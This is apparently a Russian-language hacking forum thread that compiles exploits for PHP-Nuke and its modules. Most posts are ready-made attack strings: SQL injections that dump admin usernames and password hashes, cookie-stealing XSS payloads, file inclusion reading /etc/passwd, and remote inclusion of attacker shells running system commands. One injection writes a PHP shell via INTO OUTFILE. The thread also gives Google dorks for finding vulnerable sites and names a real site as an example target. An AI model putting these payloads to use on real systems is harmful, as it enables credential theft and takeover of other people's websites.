![]() |
PHP-NUKE NukeSentinel Module
Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.
[Local File Inclusion] PHP код:
PHP код:
[Full path disclosure] PHP код:
(c) MustLive <mustlive_(at)_websecurity.com.ua> |
XSS
Код:
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>barPHP код:
Search Module(all versions) <img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) < <iframe src=http://www.google.com style=display:none onload=alert(document.cookie) < Pool and News Module PHP код:
Код:
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*modules.php?name=Reviews&rop=preview_review&title= f001&text=f002&score=9&email=00@b.org&reviewer=oob &date=00b /modules/Web_Links/voteinclude.php /modules.php?name=Statistics&op=convert_month /modules.php?name=Journal&file=add&filelist=oob /modules.php?name=Journal&file=modify&filelist=oob /db/db.php index.php?inside_mod=1 /modules.php?name=Downloads&d_op=menu /modules.php?name=Web_Links&l_op=menu modules.php?name=Web_Links&l_op=viewlink&cid=1&sho w=oob modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=oo b modules.php?name=NukeJokes&func=CatView&cat=oob modules.php?name=Downloads&d_op=viewdownload&cid=2 &show=oob modules/Calendar/config.php modules/Calendar/index.php /modules/Calendar/submit.php error.php?newlang=foobar modules/coppermine/include/crop.inc.php modules/coppermine/ecard.php modules/coppermine/displayecard.php modules/coppermine/db_input.php modules/coppermine/config.php modules/coppermine/addpic.php modules/coppermine/phpinfo.php modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=fo obar modules.php?name=NukeJokes&func=CatView&cat=foobar modules.php?name=Video_Gallery&l_op=viewcat&catid= darkbicho modules.php?name=Video_Gallery&l_op=viewclip&clipi d=darkbicho&catid=1 dork: "create the Super User" "now by clicking here" inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation" "Warning: setlocale()" intitle:PHP-nuke.powered.site "create * Super User" "now * clicking here" "Powered by PHP-Nuke" Copyright © 2003 by PHP-Nuke "allinurl:modules.php sgallery" "powered by phphnuke 6.0" intitle:"PHP-Nuke Powered Site" |
PHP-Nuke <= 8.0 (sid) Remote SQL Injection
Remote SQL Injection
Vulnerable: PHP-Nuke <= 8.0 Exploit: Код:
<?php |
Remote SQL Injection
PHP-Nuke < 8.0 Exploit Код:
<?php |
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability
example Код:
http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}EXPLOIT 1 : Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201EXPLOİT 2 : Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201 |
PHP-Nuke Module Sections (artid) Remote SQL Injection
SQL Injection Код:
Пример:Код:
allinurl: "имя секции" |
PHP-NUKE Modules Okul v1.0 Remote SQL Injection
SQL Injection Код:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*PHP-Nuke Module Inhalt (cid) SQL Injection SQL Injection Код:
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2 |
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection
SQL Injection Код:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*PHP-Nuke Module Siir (id) Remote SQL Injection SQL Injection Код:
modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202Код:
allinurl: modules-php-name-Siir |
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection
PoC: Код:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 |
PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability
Exploit_: Код:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authorsКод:
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors |
Php Nuke "Sell" module SQL Injection ("cid")
SQL Injection
Exploit: Код:
modules.php?name=Sell&d_op=viewsell&cid=- |
PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability
SQL Injection
Exploit: Код:
modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* |
Passive XSS
XSS
Заходим на http://rus-phpnuke.com/ в поле поиска вбиваем "><iframe src="javascript:alert(document.cookie);" < и видим куки. Ксс в первом посте найденая ettee не пройдет, т.к. там стоит жесткая фильтрация гета, или только кодированием. Sql inj modules 4nAlbum File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198 example: http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do= showgall&gid=[exploit] Injection: -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/* зы сплойты пойдут лесом если их правильно не закодировать. ^__^ {c}gibson |
PHP-Nuke Copyright 2005 SQL
Exploit:
Код:
-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 Код:
allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi" |
PHP-Nuke Module eGallery "pid" Remote SQL Injection
PoC: Код:
modules.php?name=eGallery&file=index&op=showpic&pi PoC: Код:
modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..Код:
inurl:"modules.php?name=seminar"The-0utl4w |
PHP-Nuke KutubiSitte "kid" SQL Injection
PHP-Nuke KutubiSitte "kid" SQL Injection
Exploit: Код:
#!/usr/bin/perl Exploit coded by r080cy90r from RBT-4 |
PHP-Nuke SQL injection Module "Hadith" [cat]
SQL Injection
Exploit: Код:
modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A |
PHP-Nuke Module NukeC30 sql injection
SQL Injection
Vulnerable: Version 3.0 Exploit: Код:
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd), |
PHP-Nuke Module ZClassifieds [cat] SQL Injection
SQL Injection
Vulnerable: Module ZClassifieds Exploit: Код:
modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd, |
XSS in PHP-Nuke (eWeather module)
XSS
Vulnerable: eWeather module Уязвимый код: в скрипте /modules/eWeather/index.php PHP код:
PoC: Код:
http://example.net/modules.php?name=eWeather&chart=[XSS]Строку 35 заменить на: "$zipCode=(int)$chart;" by: NetJackal |
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection
SQL Injection
Vulnerable: PHP-Nuke Platinum 7.6.b.5 Vuln script: dynamic_titles.php Exploit: Код:
#!/usr/bin/perl |
PHP-Nuke version 8.1 CAPTCHA bypass
Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy.
http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip |
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
Код:
------------------------------------------------------------------------------- |
PHP-Nuke GaestebuchSQL Injection Exploit
Код:
#!/usr/bin/python |
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab
Код:
#!/usr/bin/python |
Ковырял я когда то PHP Nuke 8.0. Вот парачка багов:
[XSS] http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00 "><script>alert()</script> [XSS] http://nuke/modules.php?name=Your_Account&op=logout POST: redirect=1%00"><script>alert()</script> [SQL-Inj] (POC) http://nuke/admin.php POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login |
Уязвимая версия myPHPNuke 1.8.8_8rc2
Уязвимость xss в site.ru/memberslist.php в параметрах search, letter, sortcol, sortdir, pagesize. тут все на украинском я мало что понял :) о регенат тут |
XSS:
POST-запрос на странице http://site/modules.php?name=Your_Account &op=new_user Код:
"><script src=http://site/script.js> |
Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян
Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код Exploit: Для примера возьму сайт sat-port.info Регистрируемся, редактируем наш аккаунт: Код:
http://sat-port.info/modules.php?name=Your_Account&op=edituserКод:
admin@admin.ru',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*Код:
http://sat-port.info/modules.php?name=News&file=article&sid=554 |
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability
Код:
############################################################ |
изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0
Код:
modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authorsКод:
modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors-- |
SQL-Injection PHP-Nuke <= 8.0
SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)
/modules/Reviews/index.php Фрагмент уязвимого кода: PHP код:
PHP код:
PHP код:
Идем в /modules.php?name=Reviews&rop=showcontent&id=1 выбираем любую рецензию, жмем "Поместить комментарий" в куки кидаем Код:
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)Зато через скулю в select при file_priv можно залить шелл, кидаем в куки: Код:
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем: Код:
<option value="/../../../../../../../tmp/" >RusNuke2003 |
Уязвимости модулей PHP-NUKE
Уязвимый продукт: PHP-NUKE module Pages
Версия: 1.0 Дорк: Pages © inurl:/modules.php?name=Pages SQL-injections Уязвимость в файле: index.php В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры Код:
/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23 |
Уязвимый продукт: PHP-NUKE module video stream
Версия: 4.53 Дорк: inurl:name=Video_Stream SQL-injections Уязвимость в файле: watch.php PHP код:
Примеры запросов: Код:
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23PHP код:
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1В этом модуле присуствуют сразу несколько sql-inj Примеры запросов: 1. /phpnuke/modules.php?name=Video_Stream&page=search в поле search: Код:
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*Код:
POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1PHP код:
Код:
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/* |
Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0 Дорк: inurl:modules.php?name=auktion SQL-injections В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах Примеры запросов: Код:
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21Код:
POST /modules.php?name=auktion&file=edititem HTTP/1.1 |
Уязвимый продукт: PHP-NUKE module NukeJokes
Версия: 2.2 Дорк: inurl:modules.php?name=NukeJokes SQL-injections Уязвимость в файле: index.php PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23PHP код:
Код:
POST /modules.php HTTP/1.1Уязвимость в файле: search.php PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23PHP код:
PHP код:
выбираем любую шутку, жмем добавить комментарий, в куки кидаем: Код:
author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/* |
В модулях:
Код:
http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authorsКод:
http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwdКод:
http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjoxКод:
http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20--Код:
http://site/modules.php?name=Reviews&rop=savecomment&id=1& amp;uname=f00bar&score=999999999999999999999999Код:
http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20--Код:
http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*В галерии: Код:
http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwdКод:
Код:
http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwdКод:
http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id |
Инклуды:
Код:
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell? |
XSS Версии: Код:
PHP-Nuke 7.3Код:
http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here] |
| Время: 08:48 |